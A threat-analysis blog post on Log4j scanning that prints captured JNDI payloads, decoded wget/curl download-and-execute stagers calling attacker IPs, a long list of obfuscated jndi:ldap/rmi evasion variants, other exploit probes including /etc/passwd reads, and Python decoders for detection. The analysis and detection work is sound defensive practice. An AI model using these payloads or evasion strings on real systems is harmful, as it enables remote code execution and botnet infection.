The Log4j vulnerability has hit the world. Every day, attackers scan servers around the world looking for hosts affected by the Log4j vulnerabilities, which would eventually allow them to take over those servers. We took a close look at the scanning techniques they use to find servers with Log4j vulnerabilities.

Their most basic method is sending the string “${jndi:ldap://**.**.**:53/c}” and examining the server’s response. However, this pattern has been widely disclosed in the media and is now quickly detected and blocked by IDS/IPS. Modified attacks such as those in the table below are therefore being used instead. These variant packets split the payload into fragments such as j}ndi, {${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p} and ${jndi:${lower:l}${lower:d}a${lower:p} so that the jndi:ldap signature is not matched.

Log4j general attack pattern
"t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')" 8080
"GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1" 403 152 "-" "${jndi:ldap://${sys:os.name}/HN=${env:HOSTNAME}/feb12a13-5fe3-429a-bd12-ed0c72e2ad20}" 80

Log4j attack pattern with additional encoding

Attackers also evade pattern matching by encoding the part of the string that follows the ldap protocol. The added encoding lets them bypass detection by firewalls and other security devices, as well as detection in the log analysis that security teams collect through an ESM. The table below shows some representative examples. The entire query has been encoded with Base64. If you decode it and look more closely, you can expect to find Linux commands such as wget, bash, python and chmod, which are presumably used for the attack. Let’s move on to the actual decoding process.

Log4j attack pattern with additional encoding
{jndi:dns://168-235-82-55.referer.scanworld.net}" "{jndi:dns://168-235-82-55.useragent.scanworld.net}

The table below shows the result of actually decoding the encoded query.

In the first case, the potential attack script Exploit.sh is downloaded through wget and curl from a server set up by the attackers, the downloaded file is made executable, and the script is then run to infect the host with malicious code. Attackers are crafty enough to delete the bash file after it has run, and in the process backdoors, trojan horses and keyloggers are often installed without anyone noticing.

Moving on to the second case, ‘wget; curl-Ohttp://158.118.236/setup;’, the download is attempted twice, once with wget and once with curl. The code is written so that curl still runs if wget is not installed on the server. This looks like the script of an attacker who took care that infection takes place regardless of the environment. As in the first case, the file is made executable with chmod 777 and then run, which infects the host with the file in question.

In the third case, the pattern cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; appears, which is well known to be frequently used in botnet attacks. Analysis of the bins.sh file shows that it is a foothold for running the same botnet malware. A Mozi botnet alert was recently issued, and Mozi is known to be closely related to this type of attack.

1) Encoded: /TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==
   Decoded: wget **.***.**.**/Exploit.sh; chmod +x Exploit.sh; ./Exploit.sh; rm -rf Exploit.sh
2) Encoded: /TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0
   Decoded: wget; curl -O; chmod 777 setup; ./setup exploit
3) Encoded: /TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE5Mi45NS41MC4yMjgvYmlucy5zaCAtbyBiaW5zLnNoOyB3Z2V0IGh0dHA6Ly8xOTIuOTUuNTAuMjI4L2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYyA=
   Decoded: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl -o bins.sh; wget; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c
4) Encoded: /TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzEzNS4xNDguOTEuMTQ2L2JpbnMuc2ggLW8gYmlucy5zaDsgd2dldCBodHRwOi8vMTM1LjE0OC45MS4xNDYvYmlucy5zaDsgY2htb2QgNzc3IGJpbnMuc2g7IHNoIGJpbnMuc2g7IHJtIC1yZiBiaW5zLnNoOyBoaXN0b3J5IC1j
   Decoded: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl -o bins.sh; wget; chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.mips > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; vi curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.spc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget; curl -O; cat db0fa4b8db0333367e9bda3ab68b8042.arc > Exploit; chmod +x *; ./Exploit log4j2
Exploit.sh file
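As an added example (not code from the original post or from Criminal IP), the following Python routine automates the decoding step shown in the table above for triage: it pulls the Command/Base64 segment out of a logged JNDI URL, repairs padding, decodes it, and reports which of the staging commands seen on this page (cd /tmp, wget, curl, chmod, rm -rf, history -c) the payload contains. The sample log line and its Base64 blob are constructed here, with the placeholder ATTACKER_HOST in place of a real download server.

```python
import base64
import binascii
import re

# The page's samples carry the shell command in a path segment: .../Command/Base64/<blob>
B64_SEGMENT = re.compile(r"/Command/Base64/([A-Za-z0-9+/=_-]+)")
# Staging commands that the decoded payloads on this page chain together.
STAGER_MARKERS = ("cd /tmp", "wget", "curl", "chmod", "rm -rf", "history -c")


def extract_command(log_line):
    """Return the decoded command carried in a Command/Base64 segment, or None."""
    m = B64_SEGMENT.search(log_line)
    if not m:
        return None
    blob = m.group(1).replace("-", "+").replace("_", "/")  # accept the URL-safe alphabet too
    blob += "=" * (-len(blob) % 4)  # restore padding dropped by log or URL truncation
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def stager_markers(command):
    """Which of the known staging commands appear in a decoded payload."""
    return [marker for marker in STAGER_MARKERS if marker in command]


# Constructed sample shaped like the third case in the table above; ATTACKER_HOST is a
# placeholder, not a real download server.
SAMPLE_COMMAND = (
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; "
    "curl http://ATTACKER_HOST/bins.sh -o bins.sh; wget http://ATTACKER_HOST/bins.sh; "
    "chmod 777 bins.sh; sh bins.sh; rm -rf bins.sh; history -c"
)
SAMPLE_BLOB = base64.b64encode(SAMPLE_COMMAND.encode()).decode()
SAMPLE_LOG = "${jndi:ldap://ATTACKER_HOST:2420/TomcatBypass/Command/Base64/" + SAMPLE_BLOB + "}"

if __name__ == "__main__":
    command = extract_command(SAMPLE_LOG)
    print(command)
    print(stager_markers(command))
```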

Response Method – Signature Detection Variations

First, a defense at the IPS/IDS/WAF stage has to respond to the irregular methods attackers use to evade rules. There is no need to painstakingly register every attack keyword shown below, nor are regular expressions needed to the same extent. What the variants have in common is the form ‘jndi:ldap://hacker-server/Query’. In general, ‘jndi’ and ‘ldap’ are expected to be registered already for Log4j detection. Beyond that, the attacks can be detected through keywords such as ‘${:’, ‘rmi’ and ‘${lower:’.

${jndi:ldap://domain.com/j}
${jndi:ldap:/domain.com/a}
${jndi:dns:/domain.com}
${jndi:dns://domain.com/j}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j}
${${::-j}ndi:rmi://domain.com/j}
${jndi:rmi://domainldap.com/j}
${${lower:jndi}:${lower:rmi}://domain.com/j}
${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j}
${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://domain.com/j}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j}
${jndi:${lower:l}${lower:d}a${lower:p}://domain.com}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//domain.com/a}
${jn${env::-}di:ldap://domain.com/j}
${jn${date:}di${date:':'}ldap://domain.com/j}
${j${k8s:k5:-ND}i${sd:k5:-:}ldap://domain.com/j}
${j${main:\k5:-Nd}i${spring:k5:-:}ldap://domain.com/j}
${j${sys:k5:-nD}${lower:i${web:k5:-:}}ldap://domain.com/j}
${j${::-nD}i${::-:}ldap://domain.com/j}
${j${EnV:K5:-nD}i:ldap://domain.com/j}
${j${loWer:Nd}i${uPper::}ldap://domain.com/j}
${jndi:ldap://}
${jnd${upper:ı}:ldap://domain.com/j}
${jnd${sys:SYS_NAME:-i}:ldap:/domain.com/j}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://domain.com/j}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://domain.com/j}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://domain.com/j}
${\u006a\u006e\u0064\u0069:ldap://domain.com/j}
${jn${lower:d}i:l${lower:d}ap://${lower:x}${lower:f}.domain.com/j}
${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j}
%24%7Bjndi:ldap://domain.com/j%7D
%24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D
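Rather than registering each variant above as its own keyword, a detector can fold them back into the plain jndi:<scheme> form before matching. The following is an added example (not code from the original post or from Criminal IP): it URL-decodes the text, expands \uXXXX escapes, and then resolves innermost ${...} lookups the way Log4j 2 does for lower:, upper:, date:'x' and the :-default fallback, leaving lookups it does not model (such as ${jndi:...} itself) in place for the final signature check. It assumes only the lookup types that appear in the list above; sample inputs are taken from that list.

```python
import re
from urllib.parse import unquote

# Schemes a Log4j JNDI lookup can resolve against an attacker-controlled server.
JNDI_SCHEME = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|http)", re.IGNORECASE)
# An innermost ${...} lookup: one that contains no further "${", "{" or "}".
INNER = re.compile(r"\$\{([^${}]*)\}")
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")


def _resolve(m):
    """Evaluate one innermost lookup as Log4j 2 would, or leave it untouched."""
    body = m.group(1)
    head, sep, rest = body.partition(":")
    key = head.lower()  # ${loWer:..} and ${uPper:..} are matched case-insensitively
    if sep and key in ("lower", "upper"):
        return rest.lower() if key == "lower" else rest.upper()
    if sep and key == "date":
        return rest.replace("'", "")  # ${date:':'} yields ':', ${date:} yields nothing
    if ":-" in body:
        # ${env:NaN:-j}, ${::-j}, ${sys:k5:-nD}: the lookup fails and the default wins.
        return body.split(":-", 1)[1]
    return m.group(0)  # e.g. ${jndi:ldap://...}: kept for the signature check


def normalize(raw):
    """URL-decode, expand \\uXXXX escapes, then resolve lookups from the inside out."""
    text = unquote(unquote(raw))  # second pass handles %2524-style double encoding
    text = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)
    for _ in range(64):  # bounded: every pass that changes the text removes a ${...}
        new = INNER.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(raw):
    """True when the normalized text contains a jndi:<scheme> lookup."""
    return JNDI_SCHEME.search(normalize(raw)) is not None


if __name__ == "__main__":
    # Variants from the list above plus one benign request.
    for s in (
        "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://domain.com/j}",
        "${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://domain.com/j}",
        "%24%7Bjn$%7Benv::-%7Ddi:ldap://domain.com/j%7D",
        "GET /search?q=log4j+patch HTTP/1.1",
    ):
        print(is_log4shell_probe(s), normalize(s))
```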

Response Method – Verification of download IP addresses

Additionally, the URL or IP address included in the query is verified using an IP intelligence system. For example, when the IP address in the query below is checked with Criminal IP, it shows a security vulnerability together with a history of being registered in a honeypot and of appearing in a Snort signature; these are combined into a single score and the address is diagnosed as a Critical IP.

The attacks detected along with Log4j

As a side note, the attack packets below are some of the many found alongside Log4j scanning. Attackers do not stop at a single attack. Since the Log4j issue broke out, it has become necessary to go one step further and monitor the other logs of the IP addresses from which Log4j attacks were launched, instead of defending against Log4j alone. The collected web logs show that large-scale scanning and remote code execution attacks were carried out before the Log4j attack. It is therefore important to apply security patches not only for the vulnerability at issue but also for existing or neglected ones throughout the entire process.

POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
GET /solr/admin/info/system?wt=json
GET /securityRealm/user/admin/search/index?q=a HTTP/1.1
GET /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
GET /console/
POST /Autodiscover/Autodiscover.xml HTTP/1.1
POST /_ignition/execute-solution HTTP/1.1
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1 <- cat /etc/passwd
POST /api/v1 HTTP/1.1
The attack packets detected along with Log4j

Note 1) log4shell – Quick Guide , https://musana.net/2021/12/13/log4shell-Quick-Guide

This article was written by drawing on data provided by Criminal IP.